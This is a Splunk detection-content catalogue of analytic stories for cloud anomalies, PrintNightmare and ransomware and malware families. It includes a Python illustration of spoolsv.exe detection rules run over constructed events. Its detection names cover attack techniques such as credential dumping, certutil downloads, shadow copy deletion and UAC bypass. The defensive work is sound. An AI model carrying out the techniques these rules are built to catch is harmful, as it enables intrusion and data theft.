Detect AWS Console Login by User from New Country | T1535 | Unused/Unsupported Cloud Regions | Defense Evasion | Hunting
Detect AWS Console Login by User from New Region | T1535 | Unused/Unsupported Cloud Regions | Defense Evasion | Hunting

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Suspicious cloud instance activities

Monitor your cloud infrastructure provisioning activities for behaviors originating from unfamiliar or unusual locations. These behaviors may indicate that malicious activities are occurring somewhere within your cloud environment.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Change
  • Last Updated: 2020-08-25
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Abnormally High Number Of Cloud Instances Destroyed | T1078.004, T1537 | Cloud Accounts, Transfer Data to Cloud Account | Defense Evasion, Persistence, Privilege Escalation, Initial Access, Exfiltration | Anomaly
Abnormally High Number Of Cloud Instances Launched | T1078.004, T1535 | Cloud Accounts, Unused/Unsupported Cloud Regions | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly
Cloud Instance Modified By Previously Unseen User | T1078.004 | Cloud Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly
Detect shared ec2 snapshot | T1537 | Transfer Data to Cloud Account | Exfiltration | TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Suspicious cloud provisioning activities

Monitor your cloud infrastructure provisioning activities for behaviors originating from unfamiliar or unusual locations. These behaviors may indicate that malicious activities are occurring somewhere within your cloud environment.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Change
  • Last Updated: 2018-08-20
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Cloud Provisioning Activity From Previously Unseen City | T1078 | Valid Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly
Cloud Provisioning Activity From Previously Unseen Country | T1078 | Valid Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly
Cloud Provisioning Activity From Previously Unseen IP Address | T1078 | Valid Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly
Cloud Provisioning Activity From Previously Unseen Region | T1078 | Valid Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly

Kill Chain Phase

Reference


version: 1


Suspicious cloud user activities

Detect and investigate suspicious activities by users and roles in your cloud environments.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Change
  • Last Updated: 2020-09-04
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
AWS IAM AccessDenied Discovery Events | T1580, T1078.004, T1078 | Cloud Infrastructure Discovery, Cloud Accounts, Valid Accounts | Discovery, Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly
Abnormally High Number Of Cloud Infrastructure API Calls | T1078.004 | Cloud Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly
Abnormally High Number Of Cloud Security Group API Calls | T1078.004 | Cloud Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly
Cloud API Calls From Previously Unseen User Roles | T1078 | Valid Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Reconnaissance


Reference


version: 1


Suspicious gcp storage activities

Use the searches in this Analytic Story to monitor your GCP Storage buckets for evidence of anomalous activity and suspicious behaviors, such as detecting open storage buckets and buckets being accessed from a new IP. The contextual and investigative searches will give you more information, when required.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-08-05
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Detect GCP Storage access from a new IP | T1530 | Data from Cloud Storage Object | Collection | Anomaly
Detect New Open GCP Storage Buckets | T1530 | Data from Cloud Storage Object | Collection | TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1



Lateral Movement

Printnightmare cve-2021-34527

The following analytic story identifies behaviors related to PrintNightmare (CVE-2021-34527, previously tracked as CVE-2021-1675), which attackers use to gain privilege escalation on the vulnerable machine.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-07-01
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Print Spooler Adding A Printer Driver | T1547.012, T1218.011, T1068 | Print Processors, Rundll32, Exploitation for Privilege Escalation | Persistence, Privilege Escalation, Defense Evasion | TTP
Print Spooler Failed to Load a Plug-in | T1547.012 | Print Processors | Persistence, Privilege Escalation | TTP
Rundll32 with no Command Line Arguments with Network | T1218.011 | Rundll32 | Defense Evasion | TTP
Spoolsv Spawning Rundll32 | T1547.012 | Print Processors | Persistence, Privilege Escalation | TTP
Spoolsv Suspicious Loaded Modules | T1547.012 | Print Processors | Persistence, Privilege Escalation | TTP
Spoolsv Suspicious Process Access | T1068 | Exploitation for Privilege Escalation | Privilege Escalation | TTP
Spoolsv Writing a DLL | T1547.012 | Print Processors | Persistence, Privilege Escalation | TTP
Spoolsv Writing a DLL - Sysmon | T1547.012 | Print Processors | Persistence, Privilege Escalation | TTP
Suspicious Rundll32 no Command Line Arguments | T1218.011 | Rundll32 | Defense Evasion | TTP
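Most rows in this table describe one process, `spoolsv.exe`, doing things a print spooler should not: writing a DLL into the driver store (`...\spool\drivers\...`), spawning `rundll32.exe`, loading an unsigned module from that store, and a `rundll32.exe` that starts with no arguments at all. The block below is an added Python illustration of those four checks over Sysmon-style events (EventID 1 process create, 7 image load, 11 file create); it is not Splunk content or one of the SPL searches above, and the file names and events are constructed.

```python
"""Added example (not Splunk content): the spoolsv.exe behaviours this story watches,
evaluated over constructed Sysmon-style events (EventID 1 process create, 7 image load,
11 file create): spoolsv writing a DLL into the print driver store, spoolsv spawning
rundll32/cmd/powershell, spoolsv loading an unsigned module from the driver store, and
rundll32 started with no command-line arguments.

Assumptions (not from the page): file names, paths and events are constructed."""
import re

DRIVER_STORE_RE = re.compile(r"\\spool\\drivers\\", re.I)
RUNDLL32_NO_ARGS_RE = re.compile(r'^\s*"?(?:[a-z]:\\[^"]*\\)?rundll32(?:\.exe)?"?\s*$', re.I)
SUSPICIOUS_CHILDREN = {"rundll32.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


def _base(path):
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


# Constructed Sysmon-style events (field names follow Sysmon's event data).
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Windows\System32\spoolsv.exe",
     "TargetFilename": r"C:\Windows\System32\spool\drivers\x64\3\New\evil.dll"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\spoolsv.exe",
     "Image": r"C:\Windows\System32\rundll32.exe", "CommandLine": "rundll32.exe"},
    {"EventID": 7, "Image": r"C:\Windows\System32\spoolsv.exe",
     "ImageLoaded": r"C:\Windows\System32\spool\drivers\x64\3\evil.dll", "Signed": "false"},
    # Benign: a signed driver module loaded from the same store (legitimate driver installs do this).
    {"EventID": 7, "Image": r"C:\Windows\System32\spoolsv.exe",
     "ImageLoaded": r"C:\Windows\System32\spool\drivers\x64\3\unidrv.dll", "Signed": "true"},
    # Benign: rundll32 with a real DLL and export, launched by explorer.
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
]


def evaluate_event(ev):
    """Return the list of rule names this single event triggers (possibly several)."""
    hits = []
    eid = ev.get("EventID")
    image = _base(ev.get("Image", ""))
    parent = _base(ev.get("ParentImage", ""))
    if eid == 11 and image == "spoolsv.exe":
        target = ev.get("TargetFilename", "")
        if DRIVER_STORE_RE.search(target) and target.lower().endswith(".dll"):
            hits.append("spoolsv_writes_dll_to_driver_store")
    if eid == 1 and parent == "spoolsv.exe" and image in SUSPICIOUS_CHILDREN:
        hits.append("spoolsv_spawns_" + image.split(".")[0])
    if eid == 1 and image == "rundll32.exe" and RUNDLL32_NO_ARGS_RE.match(ev.get("CommandLine", "")):
        hits.append("rundll32_no_command_line_arguments")
    if eid == 7 and image == "spoolsv.exe":
        loaded = ev.get("ImageLoaded", "")
        if DRIVER_STORE_RE.search(loaded) and str(ev.get("Signed", "")).lower() != "true":
            hits.append("spoolsv_loads_unsigned_module_from_driver_store")
    return hits


def scan_events(events):
    """Flatten all rule hits across a batch of events."""
    return [{"rule": rule, "event": ev} for ev in events for rule in evaluate_event(ev)]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding["rule"])
```

The DLL-write rule on its own fires for every legitimate driver installation, which is why the story pairs it with the spawn and unsigned-load rules; in triage, the same host producing all three within a short window is the combination worth paging on.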

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 1



Malware

Blackmatter ransomware

Leverage searches that allow you to detect and investigate unusual activities that might relate to the BlackMatter ransomware, including looking for file writes associated with BlackMatter, forced safe-mode boot, AutoAdminLogon account registry modification and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-09-06
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Add DefaultUser And Password In Registry | T1552.002, T1490, T1491, T1486 | Credentials in Registry, Inhibit System Recovery, Defacement, Data Encrypted for Impact | Credential Access, Impact | Anomaly
Auto Admin Logon Registry Entry | T1552.002 | Credentials in Registry | Credential Access | TTP
Bcdedit Command Back To Normal Mode Boot | T1490 | Inhibit System Recovery | Impact | TTP
Change To Safe Mode With Network Config | T1490 | Inhibit System Recovery | Impact | TTP
Known Services Killed by Ransomware | T1490 | Inhibit System Recovery | Impact | TTP
Modification Of Wallpaper | T1491 | Defacement | Impact | TTP
Ransomware Notes bulk creation | T1486 | Data Encrypted for Impact | Impact | Anomaly

Kill Chain Phase

  • Exploitation
  • Obfuscation


Reference


version: 1


Clop ransomware

Leverage searches that allow you to detect and investigate unusual activities that might relate to the Clop ransomware, including looking for file writes associated with Clop, encryption of network shares, deletion and resizing of shadow volume storage, registry key modification, deletion of security logs, and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-03-17
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Clop Common Exec Parameter | T1204, T1543, T1485, T1569.002, T1490, T1486, T1070, T1489, T1070.001 | User Execution, Create or Modify System Process, Data Destruction, Service Execution, Inhibit System Recovery, Data Encrypted for Impact, Indicator Removal on Host, Service Stop, Clear Windows Event Logs | Execution, Persistence, Privilege Escalation, Impact, Defense Evasion | TTP
Clop Ransomware Known Service Name | T1543 | Create or Modify System Process | Persistence, Privilege Escalation | TTP
Common Ransomware Extensions | T1485 | Data Destruction | Impact | Hunting
Common Ransomware Notes | T1485 | Data Destruction | Impact | Hunting
Create Service In Suspicious File Path | T1569.002 | Service Execution | Execution | TTP
Deleting Shadow Copies | T1490, T1070, T1070.001 | Inhibit System Recovery, Indicator Removal on Host, Clear Windows Event Logs | Impact, Defense Evasion | TTP
High File Deletion Frequency | T1485 | Data Destruction | Impact | Anomaly
High Process Termination Frequency | T1486 | Data Encrypted for Impact | Impact | Anomaly
Process Deleting Its Process File Path | T1070 | Indicator Removal on Host | Defense Evasion | TTP
Ransomware Notes bulk creation | T1486 | Data Encrypted for Impact | Impact | Anomaly
Resize ShadowStorage volume | T1490 | Inhibit System Recovery | Impact | TTP
Resize Shadowstorage Volume | T1489 | Service Stop | Impact | TTP
Suspicious Event Log Service Behavior | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP
Suspicious wevtutil Usage | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP
WevtUtil Usage To Clear Logs | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP
Windows Event Log Cleared | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation
  • Obfuscation
  • Privilege Escalation


Reference


version: 1


Coldroot macos rat

Leverage searches that allow you to detect and investigate unusual activities that relate to the ColdRoot Remote Access Trojan that affects macOS. Examples of these activities are changes to sensitive binaries in the macOS sub-system, process names and executables associated with the RAT, the installation of a keyboard tap (keylogging) on a macOS machine, and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2019-01-09
  • Use Case: Advanced Threat Detection

Dhs report ta18-074a

Monitor for suspicious activities associated with DHS Technical Alert US-CERT TA18-074A. Some of the activities that adversaries used in these compromises included spearphishing attacks, malware, watering-hole domains and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint, Network_Traffic
  • Last Updated: 2020-01-22
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Create local admin accounts using net exe | T1136.001, T1071.002, T1021.002, T1569.002, T1059.001, T1562.004, T1547.001, T1543.003, T1053.005, T1204.002, T1112 | Local Account, File Transfer Protocols, SMB/Windows Admin Shares, Service Execution, PowerShell, Disable or Modify System Firewall, Registry Run Keys / Startup Folder, Windows Service, Scheduled Task, Malicious File, Modify Registry | Persistence, Command and Control, Lateral Movement, Execution, Defense Evasion, Privilege Escalation | TTP
Detect New Local Admin account | T1136.001 | Local Account | Persistence | TTP
Detect Outbound SMB Traffic | T1071.002 | File Transfer Protocols | Command and Control | TTP
Detect PsExec With accepteula Flag | T1021.002 | SMB/Windows Admin Shares | Lateral Movement | TTP
Detect Renamed PSExec | T1569.002 | Service Execution | Execution | Hunting
Malicious PowerShell Process - Execution Policy Bypass | T1059.001 | PowerShell | Execution | TTP
Processes launching netsh | T1562.004 | Disable or Modify System Firewall | Defense Evasion | TTP
Registry Keys Used For Persistence | T1547.001 | Registry Run Keys / Startup Folder | Persistence, Privilege Escalation | TTP
SMB Traffic Spike | T1021.002 | SMB/Windows Admin Shares | Lateral Movement | Anomaly
SMB Traffic Spike - MLTK | T1021.002 | SMB/Windows Admin Shares | Lateral Movement | Anomaly
Sc exe Manipulating Windows Services | T1543.003 | Windows Service | Persistence, Privilege Escalation | TTP
Scheduled Task Deleted Or Created via CMD | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | TTP
Single Letter Process On Endpoint | T1204.002 | Malicious File | Execution | TTP
Suspicious Reg exe Process | T1112 | Modify Registry | Defense Evasion | TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Execution
  • Exploitation
  • Installation
  • Lateral Movement


Reference


version: 2


Darkside ransomware

Leverage searches that allow you to detect and investigate unusual activities that might relate to the DarkSide ransomware.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-05-12
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Attempted Credential Dump From Registry via Reg exe | T1003.002, T1197, T1105, T1218.003, T1055, T1490, T1003.001, T1021.002, T1020, T1569.002, T1486, T1548.002 | Security Account Manager, BITS Jobs, Ingress Tool Transfer, CMSTP, Process Injection, Inhibit System Recovery, LSASS Memory, SMB/Windows Admin Shares, Automated Exfiltration, Service Execution, Data Encrypted for Impact, Bypass User Account Control | Credential Access, Defense Evasion, Persistence, Command and Control, Privilege Escalation, Impact, Lateral Movement, Exfiltration, Execution | TTP
BITSAdmin Download File | T1197, T1105 | BITS Jobs, Ingress Tool Transfer | Defense Evasion, Persistence, Command and Control | TTP
CMLUA Or CMSTPLUA UAC Bypass | T1218.003 | CMSTP | Defense Evasion | TTP
CertUtil Download With URLCache and Split Arguments | T1105 | Ingress Tool Transfer | Command and Control | TTP
CertUtil Download With VerifyCtl and Split Arguments | T1105 | Ingress Tool Transfer | Command and Control | TTP
Cobalt Strike Named Pipes | T1055 | Process Injection | Defense Evasion, Privilege Escalation | TTP
Delete ShadowCopy With PowerShell | T1490 | Inhibit System Recovery | Impact | TTP
Detect Mimikatz Using Loaded Images | T1003.001 | LSASS Memory | Credential Access | TTP
Detect PsExec With accepteula Flag | T1021.002 | SMB/Windows Admin Shares | Lateral Movement | TTP
Detect RClone Command-Line Usage | T1020 | Automated Exfiltration | Exfiltration | TTP
Detect Renamed PSExec | T1569.002 | Service Execution | Execution | Hunting
Detect Renamed RClone | T1020 | Automated Exfiltration | Exfiltration | Hunting
Extraction of Registry Hives | T1003.002 | Security Account Manager | Credential Access | TTP
Ransomware Notes bulk creation | T1486 | Data Encrypted for Impact | Impact | Anomaly
SLUI RunAs Elevated | T1548.002 | Bypass User Account Control | Privilege Escalation, Defense Evasion | TTP
SLUI Spawning a Process | T1548.002 | Bypass User Account Control | Privilege Escalation, Defense Evasion | TTP

Kill Chain Phase

  • Actions on Objectives
  • Execution
  • Exfiltration
  • Exploitation
  • Lateral Movement
  • Obfuscation


Reference


version: 1


Dynamic dns

Detect and investigate hosts in your environment that may be communicating with dynamic domain providers. Attackers may leverage these services to help them avoid firewall blocks and deny lists.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint, Network_Resolution
  • Last Updated: 2018-09-06
  • Use Case: Security Monitoring

Detection Profile

name | ID | Technique | Tactic | Type
DNS Exfiltration Using Nslookup App | T1048, T1071.004, T1048.003, T1095, T1041, T1189, T1537, T1114.001, T1114, T1114.003, T1071.001 | Exfiltration Over Alternative Protocol, DNS, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Non-Application Layer Protocol, Exfiltration Over C2 Channel, Drive-by Compromise, Transfer Data to Cloud Account, Local Email Collection, Email Collection, Email Forwarding Rule, Web Protocols | Exfiltration, Command And Control, Exfiltration, Command And Control, Exfiltration, Initial Access, Exfiltration, Collection, Collection, Collection, Command And Control | TTP
Detect hosts connecting to dynamic domain providers | T1189 | Drive-by Compromise | Initial Access | TTP
Excessive Usage of NSLOOKUP App | T1048 | Exfiltration Over Alternative Protocol | Exfiltration | Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Exploitation


Reference


version: 2


Emotet malware dhs report ta18-201a

Detect rarely used executables, specific registry paths that may confer malware survivability and persistence, instances where cmd.exe is used to launch script interpreters, and other indicators that the Emotet financial malware has compromised your environment.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Email, Endpoint, Network_Traffic
  • Last Updated: 2020-01-27
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
Detect Rare Executables | | | | Anomaly
Detect Use of cmd exe to Launch Script Interpreters | T1059.003, T1072, T1547.001, T1021.002, T1566.001 | Windows Command Shell, Software Deployment Tools, Registry Run Keys / Startup Folder, SMB/Windows Admin Shares, Spearphishing Attachment | Execution, Execution, Lateral Movement, Persistence, Privilege Escalation, Lateral Movement, Initial Access | TTP
Detection of tools built by NirSoft | T1072 | Software Deployment Tools | Execution, Lateral Movement | TTP
Email Attachments With Lots Of Spaces | | | | Anomaly
Registry Keys Used For Persistence | T1547.001 | Registry Run Keys / Startup Folder | Persistence, Privilege Escalation | TTP
SMB Traffic Spike | T1021.002 | SMB/Windows Admin Shares | Lateral Movement | Anomaly
SMB Traffic Spike - MLTK | T1021.002 | SMB/Windows Admin Shares | Lateral Movement | Anomaly
Suspicious Email Attachment Extensions | T1566.001 | Spearphishing Attachment | Initial Access | Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Delivery
  • Exploitation
  • Installation


Reference


version: 1


Fin7

Leverage searches that allow you to detect and investigate unusual activities that might relate to the FIN7 JS Implant and JSSLoader, including looking for image loading of LDAP and WMI modules associated with its payload, data collection and script execution.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-09-14
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
Check Elevated CMD using whoami | T1033, T1059.007, T1555.003, T1566.001, T1220 | System Owner/User Discovery, JavaScript, Credentials from Web Browsers, Spearphishing Attachment, XSL Script Processing | Discovery, Execution, Credential Access, Initial Access, Defense Evasion | TTP
Cmdline Tool Not Executed In CMD Shell | T1059.007 | JavaScript | Execution | TTP
Jscript Execution Using Cscript App | T1059.007 | JavaScript | Execution | TTP
MS Scripting Process Loading Ldap Module | T1059.007 | JavaScript | Execution | Anomaly
MS Scripting Process Loading WMI Module | T1059.007 | JavaScript | Execution | Anomaly
Non Chrome Process Accessing Chrome Default Dir | T1555.003 | Credentials from Web Browsers | Credential Access | Anomaly
Non Firefox Process Access Firefox Profile Dir | T1555.003 | Credentials from Web Browsers | Credential Access | Anomaly
Office Application Drop Executable | T1566.001 | Spearphishing Attachment | Initial Access | TTP
Office Product Spawning Wmic | T1566.001 | Spearphishing Attachment | Initial Access | TTP
XSL Script Execution With WMIC | T1220 | XSL Script Processing | Defense Evasion | TTP

Kill Chain Phase

  • Exploitation


Reference


version: 1


Hidden cobra malware

Monitor for and investigate activities, including the creation or deletion of hidden shares and file writes, that may be evidence of infiltration by North Korean government-sponsored cybercriminals. Details of this activity were reported in DHS Report TA-18-149A.

Detection Profile

name | ID | Technique | Tactic | Type
Create or delete windows shares using net exe | T1070.005, T1071.004, T1048.003, T1071.002, T1021.001, T1021.002 | Network Share Connection Removal, DNS, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, File Transfer Protocols, Remote Desktop Protocol, SMB/Windows Admin Shares | Defense Evasion, Command And Control, Exfiltration, Command And Control, Lateral Movement, Lateral Movement | TTP
DNS Query Length Outliers - MLTK | T1071.004 | DNS | Command And Control | Anomaly
DNS Query Length With High Standard Deviation | T1048.003 | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Exfiltration | Anomaly
Detect Outbound SMB Traffic | T1071.002 | File Transfer Protocols | Command And Control | TTP
Remote Desktop Network Traffic | T1021.001 | Remote Desktop Protocol | Lateral Movement | Anomaly
Remote Desktop Process Running On System | T1021.001 | Remote Desktop Protocol | Lateral Movement | Hunting
SMB Traffic Spike | T1021.002 | SMB/Windows Admin Shares | Lateral Movement | Anomaly
SMB Traffic Spike - MLTK | T1021.002 | SMB/Windows Admin Shares | Lateral Movement | Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Command and Control


Reference


version: 2


Icedid

Leverage searches that allow you to detect and investigate unusual activities that might relate to the IcedID banking trojan, including looking for file writes associated with its payload, process injection, shellcode execution and data collection.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-07-29
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
Account Discovery With Net App | T1087.002, T1562.001, T1059, T1055, T1204.002, T1548.002, T1112, T1560.001, T1218.005, T1482, T1566.001, T1547.001, T1218.011, T1053, T1005, T1218.010, T1590.005, T1027, T1053.005, T1021.002 | Domain Account, Disable or Modify Tools, Command and Scripting Interpreter, Process Injection, Malicious File, Bypass User Account Control, Modify Registry, Archive via Utility, Mshta, Domain Trust Discovery, Spearphishing Attachment, Registry Run Keys / Startup Folder, Rundll32, Scheduled Task/Job, Data from Local System, Regsvr32, IP Addresses, Obfuscated Files or Information, Scheduled Task, SMB/Windows Admin Shares | Discovery, Defense Evasion, Execution, Defense Evasion, Privilege Escalation, Execution, Privilege Escalation, Defense Evasion, Defense Evasion, Collection, Defense Evasion, Discovery, Initial Access, Persistence, Privilege Escalation, Defense Evasion, Execution, Persistence, Privilege Escalation, Collection, Defense Evasion, Reconnaissance, Defense Evasion, Execution, Persistence, Privilege Escalation, Lateral Movement | TTP
CHCP Command Execution | T1059 | Command and Scripting Interpreter | Execution | TTP
Create Remote Thread In Shell Application | T1055 | Process Injection | Defense Evasion, Privilege Escalation | TTP
Drop IcedID License dat | T1204.002 | Malicious File | Execution | Hunting
Eventvwr UAC Bypass | T1548.002 | Bypass User Account Control | Privilege Escalation, Defense Evasion | TTP
FodHelper UAC Bypass | T1112, T1548.002 | Modify Registry, Bypass User Account Control | Defense Evasion, Privilege Escalation, Defense Evasion | TTP
IcedID Exfiltrated Archived File Creation | T1560.001 | Archive via Utility | Collection | Hunting
Mshta spawning Rundll32 OR Regsvr32 Process | T1218.005 | Mshta | Defense Evasion | TTP
NLTest Domain Trust Discovery | T1482 | Domain Trust Discovery | Discovery | TTP
Office Application Spawn Regsvr32 process | T1566.001 | Spearphishing Attachment | Initial Access | TTP
Office Application Spawn rundll32 process | T1566.001 | Spearphishing Attachment | Initial Access | TTP
Office Document Executing Macro Code | T1566.001 | Spearphishing Attachment | Initial Access | TTP
Office Product Spawning MSHTA | T1566.001 | Spearphishing Attachment | Initial Access | TTP
Registry Keys Used For Persistence | T1547.001 | Registry Run Keys / Startup Folder | Persistence, Privilege Escalation | TTP
Rundll32 Create Remote Thread To A Process | T1055 | Process Injection | Defense Evasion, Privilege Escalation | TTP
Rundll32 CreateRemoteThread In Browser | T1055 | Process Injection | Defense Evasion, Privilege Escalation | TTP
Rundll32 DNSQuery | T1218.011 | Rundll32 | Defense Evasion | TTP
Rundll32 Process Creating Exe Dll Files | T1218.011 | Rundll32 | Defense Evasion | TTP
Schedule Task with Rundll32 Command Trigger | T1053 | Scheduled Task/Job | Execution, Persistence, Privilege Escalation | TTP
Sqlite Module In Temp Folder | T1005 | Data from Local System | Collection | TTP
Suspicious IcedID Regsvr32 Cmdline | T1218.010 | Regsvr32 | Defense Evasion | TTP
Suspicious IcedID Rundll32 Cmdline | T1218.011 | Rundll32 | Defense Evasion | TTP
Suspicious Rundll32 PluginInit | T1218.011 | Rundll32 | Defense Evasion | TTP
WinEvent Scheduled Task Created Within Public Path | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation
  • Privilege Escalation
  • Reconnaissance


Reference


version: 1


Orangeworm attack group

Detect activities and various techniques associated with the Orangeworm Attack Group, a group that frequently targets the healthcare industry.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2020-01-22
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
First Time Seen Running Windows Service | T1569.002, T1055, T1106, T1569, T1574.011, T1543.003 | Service Execution, Process Injection, Native API, System Services, Services Registry Permissions Weakness, Windows Service | Execution, Defense Evasion, Privilege Escalation, Execution, Execution, Persistence, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation | Anomaly
Sc exe Manipulating Windows Services | T1543.003 | Windows Service | Persistence, Privilege Escalation | TTP

Kill Chain Phase

  • Actions on Objectives
  • Installation


Reference


version: 2


Ransomware

Leverage searches that allow you to detect and investigate unusual activities that might relate to ransomware: spikes in SMB traffic, suspicious wevtutil usage, the presence of common ransomware extensions, system processes run from unexpected locations, and many others.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint, Network_Traffic
  • Last Updated: 2020-02-04
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
7zip CommandLine To SMB Share Path | T1560.001, T1562.007, T1548, T1489, T1490, T1218.003, T1070.004, T1485, T1204, T1020, T1087.002, T1087.001, T1482, T1069.002, T1069.001, T1562.001, T1070.001, T1531, T1569.002, T1059.005, T1070, T1222, T1491, T1574.002, T1027.005, T1546.015, T1048, T1592, T1547.001, T1047, T1112, T1021.002, T1053.005, T1036.003, T1071.001, T1218.007 | Archive via Utility, Disable or Modify Cloud Firewall, Abuse Elevation Control Mechanism, Service Stop, Inhibit System Recovery, CMSTP, File Deletion, Data Destruction, User Execution, Automated Exfiltration, Domain Account, Local Account, Domain Trust Discovery, Domain Groups, Local Groups, Disable or Modify Tools, Clear Windows Event Logs, Account Access Removal, Service Execution, Visual Basic, Indicator Removal on Host, File and Directory Permissions Modification, Defacement, DLL Side-Loading, Indicator Removal from Tools, Component Object Model Hijacking, Exfiltration Over Alternative Protocol, Gather Victim Host Information, Registry Run Keys / Startup Folder, Windows Management Instrumentation, Modify Registry, SMB/Windows Admin Shares, Scheduled Task, Rename System Utilities, Web Protocols, Msiexec | Collection, Defense Evasion, Privilege Escalation, Defense Evasion, Impact, Impact, Defense Evasion, Defense Evasion, Impact, Execution, Exfiltration, Discovery, Discovery, Discovery, Discovery, Discovery, Defense Evasion, Defense Evasion, Impact, Execution, Execution, Defense Evasion, Defense Evasion, Impact, Persistence, Privilege Escalation, Defense Evasion, Defense Evasion, Privilege Escalation, Persistence, Exfiltration, Reconnaissance, Persistence, Privilege Escalation, Execution, Defense Evasion, Lateral Movement, Execution, Persistence, Privilege Escalation, Defense Evasion, Command And Control, Defense Evasion | Hunting
Allow File And Printing Sharing In Firewall | T1562.007 | Disable or Modify Cloud Firewall | Defense Evasion | TTP
Allow Network Discovery In Firewall | T1562.007, T1490, T1562.001, T1491, T1574.002, T1204, T1112, T1218.003 | Disable or Modify Cloud Firewall, Inhibit System Recovery, Disable or Modify Tools, Defacement, DLL Side-Loading, User Execution, Modify Registry, CMSTP | Defense Evasion, Impact, Defense Evasion, Impact, Persistence, Privilege Escalation, Defense Evasion, Execution, Defense Evasion, Defense Evasion | TTP
Allow Operation with Consent Admin | T1548 | Abuse Elevation Control Mechanism | Privilege Escalation, Defense Evasion | TTP
Attempt To Disable Services | T1489 | Service Stop | Impact | TTP
Attempt To delete Services | T1489 | Service Stop | Impact | TTP
